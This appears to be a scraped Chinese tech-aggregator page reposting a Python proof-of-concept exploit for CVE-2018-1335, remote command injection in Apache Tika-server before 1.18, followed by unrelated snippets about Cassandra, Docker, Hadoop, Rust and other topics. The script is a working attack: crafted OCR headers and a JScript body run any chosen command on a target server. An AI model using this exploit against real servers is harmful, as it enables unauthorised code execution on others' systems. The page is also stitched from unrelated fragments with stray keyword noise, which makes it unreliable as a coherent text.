[EXP]Apache Tika-server < 1.18 - Command Injection

阿新 • • 發佈：2019-03-14

localhost try cve link alc verify als header ont

######################################################################################################
#Description: This is a PoC for remote command execution in Apache Tika-server.                      #
#Versions Affected: Tika-server versions < 1.18                                                      #    

#Researcher: David Yesland Twitter: @Daveysec                                                        #
#Blog Link: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ #                                                                   # 
#NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2018-1335                                       # 

######################################################################################################

import sys
import requests

if len(sys.argv) < 4:
    print "Usage: python CVE-2018-1335.py <host> <port> <command>"
    print "Example: python CVE-2018-1335.py localhost 9998 calc.exe 
"
else:
    host = sys.argv[1]
    port = sys.argv[2]
    cmd = sys.argv[3]

    url = host+":"+str(port)+"/meta"

    headers = {"X-Tika-OCRTesseractPath": "\"cscript\"", 
        "X-Tika-OCRLanguage": "//E:Jscript", 
        "Expect": "100-continue", 
        "Content-type": "image/jp2", 
        "Connection": "close"}

    jscript=‘‘‘var oShell = WScript.CreateObject("WScript.Shell");
    var oExec = oShell.Exec(‘cmd /c {}‘);
    ‘‘‘.format(cmd)

    try:
        requests.put("https://"+url, headers=headers, data=jscript, verify=False)
    
    except:
        try:
            requests.put("http://"+url, headers=headers, data=jscript)
        except:
            print "Something went wrong.\nUsage: python CVE-2018-1335.py <host> <port> <command>"

localhost try cve link alc verify als header ont ######################################################################################

安裝apache-cassandra-2.1.18

安裝apache-cassandra-2.1.18IntroductionWhat is Cassandra? The Apache Cassandra database is the right choice when you need scalability(伸縮) and high availabili

Ubuntu 18.10 server 安裝docker 18.06.1-ce

直接執行docker , 報錯 [email protected]:~$ docker Command 'docker' not found, but can be installed with: sudo snap install docker

Apache Tika 1.20 釋出，內容抽取工具集合

Apache Tika 1.20 已釋出，Tika 是一個內容抽取的工具集合 (a toolkit for text extracting) 。它集成了 POI 和 Pdfbox，並且為文字抽取工作提供了一個統一的介面。其次，Tika 也提供了便利的擴充套件 API，用來

Apache Calcite 1.18.0 釋出，動態資料管理框架

Apache Calcite 1.18.0 釋出了，Calcite 是一個動態資料管理框架，用於 Hadoop 平臺。此次更新包含 200 多個 commit，亮點包括： SQL 添加了 JSON 函式和線性迴歸函式，以及聚合的 WITHIN GROUP 子句功能

[EXP]Apache Superset < 0.23 - Remote Code Execution

class div chang upgrade logo man cred hang firefox # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-

Python<1>List

復雜 filename ase code 列表解析 learning [] 語句 reverse list裏的元素以逗號隔開，以[]包圍，當中元素的類型隨意官方一點的說：list列表是一個隨意類型的對象的位置相關的有序集合。它沒有固定的大小(1)

Ubuntu14下Hadoop開發<1> 基礎環境安裝

oot jar包臺式機解壓 span ice href 安裝samba lan 準備了一臺淘汰的筆記本。單核CPU。3G內存。160G硬盤；準備一個2G的U盤在官網下載了64位的14.04版本號（麒麟）的ISO。下載UNetbootin（Ubuntu專用U盤安裝工

arcgis server 10.1 發布動態圖層展示海量及頻繁更新的數據步驟

遍歷 services new tle ole () map() 添加 source 轉自原文 arcgis server 10.1 發布動態圖層展示海量及頻繁更新的數據步驟 Arcgis server 發布動態圖層及調用動態圖層做這個動態圖層功能的原由是有

搭建Apache HTTP Server（編譯安裝）

bin con cnn 源碼 err 可能方法創建部分 mkdir /apache #創建一個Apache目錄，位置隨你們習慣wget http://mirrors.cnnic.cn/apache/httpd/httpd-2.4.25.tar.bz2 #下載a

linux中目錄操作<1>

mdi err bsp 文件的 print png usr clas sys 一、目錄的權限 (1)目錄文件的訪問權限分為三組,分別為所有者，用戶，其他。每個權限組的權限位有3個，分別為讀、寫、執行。　　註意：可以使用stat函數得到目錄文件的狀態信息。權限為在stat

《轉載》Apache HTTP Server 與 Tomcat 的三種連接方式介紹

之前 img 6.2 自定義 con 訪問 ont 是什麽 bsp 本文轉載自IBM developer 首先我們先介紹一下為什麽要讓 Apache 與 Tomcat 之間進行連接。事實上 Tomcat 本身已經提供了 HTTP 服務，該服務默認的端口是 8080，裝好 t

Percona-Server 5.7.18 編譯安裝

percona server 5.7.18一、環境介紹Centos 6.7 2.6.32-573.el6.x86_64 軟件包：percona-server-5.7.18-16.tar.gz 下載地址：https://www.percona.com/downloads/Percona-Server-LAT

xcodebuild構建時報錯unknown error -1=ffffffffffffffff Command /bin/sh failed with exit code 1

https build stack com lds turned top ngs targe CI今日構建時報出如下錯誤： /Users/xxx/Library/Developer/Xcode/DerivedData/Snowball-ebllohyukujrncba

Rust 每日千行之旅<1>：變量、可變性、常量、隱藏

main span 左值無法 nbsp hello 顯示 world! logs rust 是強類型語言，所有變量、常量都必須有明確的數據類型；很多情況下，省略類型聲明，編譯器可自動推導，但不是所有情況下都會成功。一、rust 中的變量值默認是不允許改變的，即不可二

1.1.18 zabbix監控NFS

gen dev script urn 條件創建模板 roc 服務 agen 1.1.1 zabbix監控NFS 第一步創建腳本: 添加執行權限 chmod +x cat /server/scripts/nfs_check.sh [root@web02 scripts]

centos 安裝arcgis server 10.1

啟動服務 manager kcon http 服務自啟動 arc kconfig add 1、創建新用戶，不要在root下面直接安裝 [root@localhost ~]# groupadd esri //創建esri組 [root@localhost ~]# u

Docker Compose 1.18.0 之服務編排詳解

ubun 它的 snapshot rep har container cdb 單獨 lib 一個使用Docker容器的應用，通常由多個容器組成。使用Docker Compose，不再需要使用shell腳本來啟動容器。在配置文件中，所有的容器通過services來定義，然後使

HTML學習（2018.1.18）

轉義字符空格 idt wid 水平預格輸入 nbsp bubuko 1，轉義字符轉義字符：用於表示網頁中的特殊字符 XHTML不直接輸入符號，建議使用轉義字符。 &nbsp------空格； &c

第五個神奇的電梯（代碼搶先看<1>）

電梯一個 time() i++ set define post 設計思路 pub 關於一些自認為比較獨特的設計思路，也不知道是好還是壞，放在這裏讓大家一起看一下。關於mian函數：因為采用了註冊機制所以主函數比較簡單。 #include "stdafx.h

[EXP]Apache Tika-server < 1.18 - Command Injection

相關推薦